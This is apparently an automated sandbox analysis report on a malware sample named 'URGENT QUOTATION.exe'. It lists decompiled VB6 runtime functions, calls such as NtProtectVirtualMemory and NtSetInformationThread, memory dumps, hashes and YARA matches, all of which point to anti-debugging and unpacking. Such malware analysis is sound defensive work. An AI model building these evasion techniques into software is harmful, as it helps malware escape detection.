0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041C631
__vbaNew2.MSVBVM60(00407448,0041E010,?,?,?,?,00401426), ref: 0041C656
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,00401426), ref: 0041C683
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A120,000001BC,?,?,?,?,?,?,?,?,00401426), ref: 0041C6B4
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,00401426), ref: 0041C6C5

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: d97d64f2fcafc44ebd701b3c58dad2e8c459317437f69d3f709292ca34556b00
Instruction ID: bc4dd8679f77cc55279ee11d5675a825fcbe094fda22e491ecd023914763d40f
Opcode Fuzzy Hash: d97d64f2fcafc44ebd701b3c58dad2e8c459317437f69d3f709292ca34556b00
Instruction Fuzzy Hash: 0111F774940218AFCB00DF95CC89FDDBBB8BB48708F10446AF402BA2A1C7BD58409B69

Uniqueness

Uniqueness Score: -1.00%

Function 0041AD77, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0041AD77(void* __ecx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				signed int _t17;
				intOrPtr* _t19;
				long long _t24;

				_push(0xc);
				L00401420();
				_push(__ecx);
				_push(__ecx);
				_v12 =  *0x401210;
				_t24 =  *0x401210;
				_push(__ecx);
				_push(__ecx);
				 *_t19 = _t24;
				asm("fldz");
				_push(__ecx);
				_push(__ecx);
				 *_t19 = _t24;
				L0040151C();
				L00401522();
				asm("fcomp qword [0x401208]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags != 0) {
					_v12 =  *0x401200 *  *0x4011f8;
					 *_t19 = _v12;
					_t17 =  *((intOrPtr*)( *_a4 + 0x84))(_a4, __ecx);
					asm("fclex");
					_v8 = _t17;
					if(_v8 >= 0) {
						_t11 =  &_v16;
						 *_t11 = _v16 & 0x00000000;
						__eflags =  *_t11;
					} else {
						_push(0x84);
						_push(0x409eb0);
						_push(_a4);
						_push(_v8);
						L004015AC();
						_v16 = _t17;
					}
				}
				return 0;
			}

0x0041ad7a
0x0041ad7d
0x0041ad88
0x0041ad89
0x0041ad8a
0x0041ad8d
0x0041ad93
0x0041ad94
0x0041ad95
0x0041ad98
0x0041ad9a
0x0041ad9b
0x0041ad9c
0x0041ad9f
0x0041ada4
0x0041ada9
0x0041adaf
0x0041adb1
0x0041adb2
0x0041adc0
0x0041adc7
0x0041add2
0x0041add8
0x0041adda
0x0041ade1
0x0041adfd
0x0041adfd
0x0041adfd
0x0041ade3
0x0041ade3
0x0041ade8
0x0041aded
0x0041adf0
0x0041adf3
0x0041adf8
0x0041adf8
0x0041ade1
0x0041ae04

APIs

__vbaChkstk.MSVBVM60 ref: 0041AD7D
#671.MSVBVM60 ref: 0041AD9F
__vbaFpR8.MSVBVM60 ref: 0041ADA4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409EB0,00000084), ref: 0041ADF3

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#671CheckChkstkHresult
String ID:
API String ID: 3438959223-0
Opcode ID: f2b46d0b89e32ca8094c295d37f1daf37bb0379676433323984f81f9d37d64bf
Instruction ID: b63bc6e3ea75b835a4130e76dbdfd16c72d83a59ca80810432a34e7d2ae8d5ec
Opcode Fuzzy Hash: f2b46d0b89e32ca8094c295d37f1daf37bb0379676433323984f81f9d37d64bf
Instruction Fuzzy Hash: 42018071940509FFCB00AF91DD09AAE7BB4FB44345F0185AEF181760B0CB7945A09B59

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE07, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041AE07(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v56;
				char _v72;
				char* _t18;
				void* _t25;
				void* _t27;
				intOrPtr _t28;

				_t28 = _t27 - 0xc;
				 *[fs:0x0] = _t28;
				L00401420();
				_v16 = _t28;
				_v12 = 0x401218;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x38,  *[fs:0x0], 0x401426, _t25);
				 *_a8 =  *_a8 & 0x00000000;
				_t18 =  &_v72;
				_push(_t18);
				L00401516();
				L0040158E();
				_push(0x41ae8c);
				L00401594();
				return _t18;
			}

0x0041ae0a
0x0041ae19
0x0041ae23
0x0041ae2b
0x0041ae2e
0x0041ae35
0x0041ae44
0x0041ae4a
0x0041ae4d
0x0041ae50
0x0041ae51
0x0041ae5c
0x0041ae61
0x0041ae86
0x0041ae8b

APIs

__vbaChkstk.MSVBVM60(?,00401426), ref: 0041AE23
#546.MSVBVM60(?,?,?,?,?,00401426), ref: 0041AE51
__vbaVarMove.MSVBVM60(?,?,?,?,?,00401426), ref: 0041AE5C
__vbaFreeVar.MSVBVM60(0041AE8C,?,?,?,?,?,00401426), ref: 0041AE86

Memory Dump Source

Source File: 00000000.00000002.673234009.0000000000416000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.673098487.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.673119523.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.673298451.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673312782.000000000043A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.673327154.000000000043B000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$#546ChkstkFreeMove
String ID:
API String ID: 3298562087-0
Opcode ID: c3b2ee2a856bc13728aeceb1d7565a9d917576d3e1509d346bc1cd603c51a215
Instruction ID: c1d99ec80c515cf183b6262e6194843f3ef436e5cc4c7b1ed7b1c30cb2fbb8e3
Opcode Fuzzy Hash: c3b2ee2a856bc13728aeceb1d7565a9d917576d3e1509d346bc1cd603c51a215
Instruction Fuzzy Hash: FBF04930940208BFCB00EF95CA46B9DBBB8EF44744F50806AF401AB1A0C778AA45CB9A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: URGENT QUOTATION.exe PID: 6792 Parent PID: 6160 URGENT QUOTATION.exeCOMMON

Executed Functions

Function 0056216A, Relevance: 4.6, APIs: 3, Instructions: 112nativeCOMMON

Download Yara Rule

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_00000DB2), ref: 0056216E
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,00000001,00000000), ref: 0056221E
NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00562E9F

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual$ExceptionHandlerVectored
String ID:
API String ID: 4193742754-0
Opcode ID: fa5e5d8fbeb4c1401fb5f977bd7c998a0706f382900b6ecce75f99f7fdc6119f
Instruction ID: 142bcf4911022e39951ddf14a1698b7667e1db2fd933528b067170cf6f965d2f
Opcode Fuzzy Hash: fa5e5d8fbeb4c1401fb5f977bd7c998a0706f382900b6ecce75f99f7fdc6119f
Instruction Fuzzy Hash: BE3168B0100B01AFE7149F24D998FBA7F69BF16360F204269E9569B1E2D775CDC0CEA1

Uniqueness

Uniqueness Score: -1.00%

Function 00562DB2, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 361nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00562E9F

Strings

D*, xrefs: 00562509

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: D*
API String ID: 2706961497-570881808
Opcode ID: bcb5982de682c1bb72ccd6b638d8357f5b29c1f40af73f8e96e3fd658c743c3a
Instruction ID: 79d2a56f993de758b175e52d951ddaef8319c880a27f895d29c9db1212b1fd8a
Opcode Fuzzy Hash: bcb5982de682c1bb72ccd6b638d8357f5b29c1f40af73f8e96e3fd658c743c3a
Instruction Fuzzy Hash: 53C16670740B06AFFB215E60CD96BEA3E66FF55350F244128FE46AB2D1C7B998849B04

Uniqueness

Uniqueness Score: -1.00%

Function 005620B4, Relevance: 3.1, APIs: 2, Instructions: 129nativethreadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 0056213C
NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00562E9F

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectTerminateThreadVirtual
String ID:
API String ID: 1241109510-0
Opcode ID: a715013c04d4bab384a8bdf2e6c83c98443af825fbf0d3fbcea4394e1d75fd2c
Instruction ID: b22b1045c6eb365451f778796eca7173cb520a0ed7a40d64f627b4b6bd5b9d4d
Opcode Fuzzy Hash: a715013c04d4bab384a8bdf2e6c83c98443af825fbf0d3fbcea4394e1d75fd2c
Instruction Fuzzy Hash: 19213B70504B01EFEF354A94EE95BB53E597F06370F744252EE129B1E2D7668CC1CA22

Uniqueness

Uniqueness Score: -1.00%

Function 00562117, Relevance: 3.1, APIs: 2, Instructions: 91nativethreadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 0056213C
NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00562E9F

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectTerminateThreadVirtual
String ID:
API String ID: 1241109510-0
Opcode ID: a106da1e5e5ce122468f355d44a94b76bad697ebfe0d4f6af07a7a660014f8bb
Instruction ID: d5d0b574bbd166bb945ab7286ff5d242a5e9e00083285568b4911b77622a4f11
Opcode Fuzzy Hash: a106da1e5e5ce122468f355d44a94b76bad697ebfe0d4f6af07a7a660014f8bb
Instruction Fuzzy Hash: 97216A70508B01EFEB218BA4DAD5FB53E1DBF07360F244695EE529B1D2C7628C84CA22

Uniqueness

Uniqueness Score: -1.00%

Function 0056210E, Relevance: 3.1, APIs: 2, Instructions: 84nativethreadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNELBASE(000000FE,00000000), ref: 0056213C
NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00562E9F

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectTerminateThreadVirtual
String ID:
API String ID: 1241109510-0
Opcode ID: f18d5cb6e6dd4f117c90ca64f3c59c9083d29a13bb402e60023525809c325357
Instruction ID: 999ba67edce227a2b4362c7a365b81cb771fcf4d58aacbf132a102a3b39135e5
Opcode Fuzzy Hash: f18d5cb6e6dd4f117c90ca64f3c59c9083d29a13bb402e60023525809c325357
Instruction Fuzzy Hash: 28213B70504B01DFEF354A94DA95BB53E597F06370F744252EE125B1D1D7668CC1CA22

Uniqueness

Uniqueness Score: -1.00%

Function 00562CB0, Relevance: 3.0, APIs: 2, Instructions: 42sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00000005), ref: 00562D21

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8d8feca376e495327cd6c29e2d2aa5aaabdeb070f538289316dd77fdb7cedcbf
Instruction ID: 0d298a9abd557b1854caf03aa0ad483e8efc49eeee522a641a7ca1d02893bf2a
Opcode Fuzzy Hash: 8d8feca376e495327cd6c29e2d2aa5aaabdeb070f538289316dd77fdb7cedcbf
Instruction Fuzzy Hash: 2801F2B1444B02AFF3105F24C94DB993BA5BF05396F618988E9555B0F2D7B4CDC6C622

Uniqueness

Uniqueness Score: -1.00%

Function 00566145, Relevance: 1.6, APIs: 1, Instructions: 118nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7b9a14ce558c197d8656b1f1b2da18268c6acc988f4f44ffc9d7b7d7b3b76bdc
Instruction ID: ed7fa7bb0b306dccf02b5dc01721eb7922586ed13fe6de852029995ef4677f4b
Opcode Fuzzy Hash: 7b9a14ce558c197d8656b1f1b2da18268c6acc988f4f44ffc9d7b7d7b3b76bdc
Instruction Fuzzy Hash: ED314934708605CFDF394F24C4A47B57EE6BF56325FB40E6AC95287191C7348888C742

Uniqueness

Uniqueness Score: -1.00%

Function 0056613D, Relevance: 1.6, APIs: 1, Instructions: 116nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 1dd02b512e8264703a4ebe35e57e61dce62212faba1a242340dc6589910ffc75
Instruction ID: fd0d8022aaa5752a8660b7ced253d71aa336f859a4de8d802f8fd1b9e84fbb31
Opcode Fuzzy Hash: 1dd02b512e8264703a4ebe35e57e61dce62212faba1a242340dc6589910ffc75
Instruction Fuzzy Hash: 9B313730704606CEEF394F28C5F43B42EE6BF56315FB44E2AC95287295D77488C8D642

Uniqueness

Uniqueness Score: -1.00%

Function 00566161, Relevance: 1.6, APIs: 1, Instructions: 112nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: ad2ec60da82764b8a41650e3c45b51ffee019ae4206851fa860dbe644dd97403
Instruction ID: c8491422be8b0aa0eccfe2a93cb5a14834649cf1c47fc04fe316f59660a6da96
Opcode Fuzzy Hash: ad2ec60da82764b8a41650e3c45b51ffee019ae4206851fa860dbe644dd97403
Instruction Fuzzy Hash: 93310434708605CEDF388F24C8A47B43EEABF56315FB40A6AC9528B2D5C7748888D742

Uniqueness

Uniqueness Score: -1.00%

Function 005661B5, Relevance: 1.6, APIs: 1, Instructions: 106nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: cdbab529db2654a426d6521ecdfd6269c4ce06964b3a4ad7cebe721d032b0ff3
Instruction ID: 939237c943b80afd9bf7cf71f3b7143f006375c26180a2b6a1a4c515b465a514
Opcode Fuzzy Hash: cdbab529db2654a426d6521ecdfd6269c4ce06964b3a4ad7cebe721d032b0ff3
Instruction Fuzzy Hash: 7331F134608345CEDF388F24C9E47B97EA9FF56319FA8099ACD928B1D5C7708889C742

Uniqueness

Uniqueness Score: -1.00%

Function 00566197, Relevance: 1.6, APIs: 1, Instructions: 100nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 413a21e76721c5e2595888ea6851128961398cac63bab735609352839e84f1dc
Instruction ID: 1e9f28c1c4bbf3d8e5466b9bbcf766155a39388f809909503a9398a9983fb2a0
Opcode Fuzzy Hash: 413a21e76721c5e2595888ea6851128961398cac63bab735609352839e84f1dc
Instruction Fuzzy Hash: 5B31F734608605CFDF388F24C5A47B87EE9BF56315FB8495AC9528B195C7748888D742

Uniqueness

Uniqueness Score: -1.00%

Function 00566281, Relevance: 1.6, APIs: 1, Instructions: 90nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 88d3c713f5ac241beef0eaca7ca1ce6ae12c786a90452cd614fbeea235f03f7d
Instruction ID: bf26f9da21b4babb6ab92e36f683257d24c75d879f2d0952de8f16c02661b4e0
Opcode Fuzzy Hash: 88d3c713f5ac241beef0eaca7ca1ce6ae12c786a90452cd614fbeea235f03f7d
Instruction Fuzzy Hash: 3821D334A0D386DEDB298B24C5D87657FADFF42319F5D09CEC9918B5D6CB608888C711

Uniqueness

Uniqueness Score: -1.00%

Function 005661F5, Relevance: 1.6, APIs: 1, Instructions: 84nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 7deeb0ff37e07c36d18220e930a70d7157228a8a2f0a7077a823bb53f84c9a90
Instruction ID: 752af00e2a84a7e91011547ccfde4209f6571cb27b198a8874f189afd62d31bf
Opcode Fuzzy Hash: 7deeb0ff37e07c36d18220e930a70d7157228a8a2f0a7077a823bb53f84c9a90
Instruction Fuzzy Hash: D821D334608605CEDF388F24C4A87B57EE9BF56316FB8195AC9528B294C77088C8DB42

Uniqueness

Uniqueness Score: -1.00%

Function 00566210, Relevance: 1.6, APIs: 1, Instructions: 83nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 0d38826f6fe9afc6a8a5fac27cee5c11bb3ddb5aa25c83b13c94ef04f26dc946
Instruction ID: e30f3e0c99da73a59180451870977337163cc4be3a1a0c080c8763f2b7ca5631
Opcode Fuzzy Hash: 0d38826f6fe9afc6a8a5fac27cee5c11bb3ddb5aa25c83b13c94ef04f26dc946
Instruction Fuzzy Hash: D9210430608245CEDF388F24C5A87B57EE9FF56316FB81A9AC9528B1D4C77088C8CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00562144, Relevance: 1.6, APIs: 1, Instructions: 82nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0056216A: RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_00000DB2), ref: 0056216E
Part of subcall function 0056216A: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,00000001,00000000), ref: 0056221E

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00562E9F

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual$ExceptionHandlerVectored
String ID:
API String ID: 4193742754-0
Opcode ID: 6b78697d6e5f12dbd1b278e2481cdafcc469eec22435056da2624b446d228319
Instruction ID: 640565078d01ce7cd426edb572260251b636ffff881d54a440bc4e0ec843a8e8
Opcode Fuzzy Hash: 6b78697d6e5f12dbd1b278e2481cdafcc469eec22435056da2624b446d228319
Instruction Fuzzy Hash: EF118CB0508B01AFEB2186A0EAD5FB93E1DBF07370F6442A5ED519B1D2C7528CC5C621

Uniqueness

Uniqueness Score: -1.00%

Function 00566239, Relevance: 1.6, APIs: 1, Instructions: 78nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 9181a4536c03105425c1ecc17900d2adb7fce17c861cc48ba46957df5ea33e32
Instruction ID: c5dc821fe0ca3d14b6ca024d3c6a625848b9c5a55b9446dad3ee2a8e09999650
Opcode Fuzzy Hash: 9181a4536c03105425c1ecc17900d2adb7fce17c861cc48ba46957df5ea33e32
Instruction Fuzzy Hash: 1F21E730608205DEDF384F24C5A87B43EE9BF56326FB81D5AC8524B195C77088C5C742

Uniqueness

Uniqueness Score: -1.00%

Function 00562D99, Relevance: 1.6, APIs: 1, Instructions: 76nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0056216A: RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_00000DB2), ref: 0056216E
Part of subcall function 0056216A: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,00000001,00000000), ref: 0056221E

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00562E9F

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual$ExceptionHandlerVectored
String ID:
API String ID: 4193742754-0
Opcode ID: ef4cf93739e50dff7e8879d0a823677475eabe76473eeedb1cce91ae294fce31
Instruction ID: 2bad70bb7a9f1b2569b1aa8f5d9604e7243813a08a6c8fc2fec10dafc137356d
Opcode Fuzzy Hash: ef4cf93739e50dff7e8879d0a823677475eabe76473eeedb1cce91ae294fce31
Instruction Fuzzy Hash: C1119EB0104B01AFD7218650DAE5BB53F5DBF07370F2042A5ED929B1D2C3658CC4C520

Uniqueness

Uniqueness Score: -1.00%

Function 00562DBB, Relevance: 1.6, APIs: 1, Instructions: 71nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00562E9F

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 4b62ea99ba86568e81a661bd5681c20bf2efc429c217d8832295f2ec0d5b87b7
Instruction ID: 8958b13dfbf69e0d0b48a333528bef4bae73017bf398fab4e505cb9272e0e41d
Opcode Fuzzy Hash: 4b62ea99ba86568e81a661bd5681c20bf2efc429c217d8832295f2ec0d5b87b7
Instruction Fuzzy Hash: 61113AB05047019FEB218B50DAD4FB93F5DBF07364F2442A6ED918B1D2C3668C84C634

Uniqueness

Uniqueness Score: -1.00%

Function 00566263, Relevance: 1.6, APIs: 1, Instructions: 69nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 13153ee20519b6a62484b1f8a13d9636fd52671cb5d0d5238857225946f0e2d4
Instruction ID: fcce9d680f1cedb9a5ca31226ad2d61b8d1734a028af25fade9289d9e52729aa
Opcode Fuzzy Hash: 13153ee20519b6a62484b1f8a13d9636fd52671cb5d0d5238857225946f0e2d4
Instruction Fuzzy Hash: 4111C830708246CEDF388F24C5A87B57EE9BF5531AFB85D5AC8618B195C77088C4C742

Uniqueness

Uniqueness Score: -1.00%

Function 00562D96, Relevance: 1.6, APIs: 1, Instructions: 68nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0056216A: RtlAddVectoredExceptionHandler.NTDLL(00000001,Function_00000DB2), ref: 0056216E
Part of subcall function 0056216A: NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,00000001,00000000), ref: 0056221E

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00562E9F

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual$ExceptionHandlerVectored
String ID:
API String ID: 4193742754-0
Opcode ID: 2d39debfe9d612c677b0ff892ddca9ab90d71c5edc8774dc71d011d326dc6146
Instruction ID: 701a8cafaa6b87c053212e5eb626a9940ae8842024981e486a965eaf270617b4
Opcode Fuzzy Hash: 2d39debfe9d612c677b0ff892ddca9ab90d71c5edc8774dc71d011d326dc6146
Instruction Fuzzy Hash: 341159B0100B01AFEB218A54DAA5FB63F5DBF073B0F204261ED569B1E2C366CCC18921

Uniqueness

Uniqueness Score: -1.00%

Function 0056217B, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,00000001,00000000), ref: 0056221E

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: f5e1aaefa052d34a57d630ef9ff50a0bc1b03b3182212c272b6e449151409be1
Instruction ID: ee91ce7f1b198fd70092955c088591734dbedf84e741898ddd47eadb076d6444
Opcode Fuzzy Hash: f5e1aaefa052d34a57d630ef9ff50a0bc1b03b3182212c272b6e449151409be1
Instruction Fuzzy Hash: BD1126B1505701DFD3049F24C988B99BBA9FF55364F12428DE8A14B1E6CB70DA88CFE0

Uniqueness

Uniqueness Score: -1.00%

Function 00562E0F, Relevance: 1.5, APIs: 1, Instructions: 49nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 00562E9F

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 59a15a5dbca3bbfad41b739877ad51bcfddde34d5fbea3f56dc1fb80e678bd50
Instruction ID: 02292b3f61302e820cb4ef02e6a18eac7043f6fa91201b31a1725de2d82c78ae
Opcode Fuzzy Hash: 59a15a5dbca3bbfad41b739877ad51bcfddde34d5fbea3f56dc1fb80e678bd50
Instruction Fuzzy Hash: 8F01F970104702AFD71097209AD9F796E5CFF0B364B2446D9ED51DB0D2C762CC498234

Uniqueness

Uniqueness Score: -1.00%

Function 005621B5, Relevance: 1.5, APIs: 1, Instructions: 43nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018,?,?,?,?,?,00000001,00000000), ref: 0056221E

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8f496fa758dbbf782db218254847c85b9ea928f0ece9809487f0477cba82ca34
Instruction ID: f3b99275be6841dd0f09a77367dedfedbf262cb5b9768076ec8064a4419cb90c
Opcode Fuzzy Hash: 8f496fa758dbbf782db218254847c85b9ea928f0ece9809487f0477cba82ca34
Instruction Fuzzy Hash: 0E01F2B1449381AFE3010F38CC88B997E68FF423A4F02058DE8919B0E6D7B48988CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00566353, Relevance: 1.5, APIs: 1, Instructions: 42nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 005663B2

Memory Dump Source

Source File: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 154642d6b5752dbb4d52f3c1df3542818f969f9e80eb4191e474d555a7d012b3
Instruction ID: f9b17c13a405dccec25146cc41daa95e1631d8fa797c4b643c9f7397fce4dd04
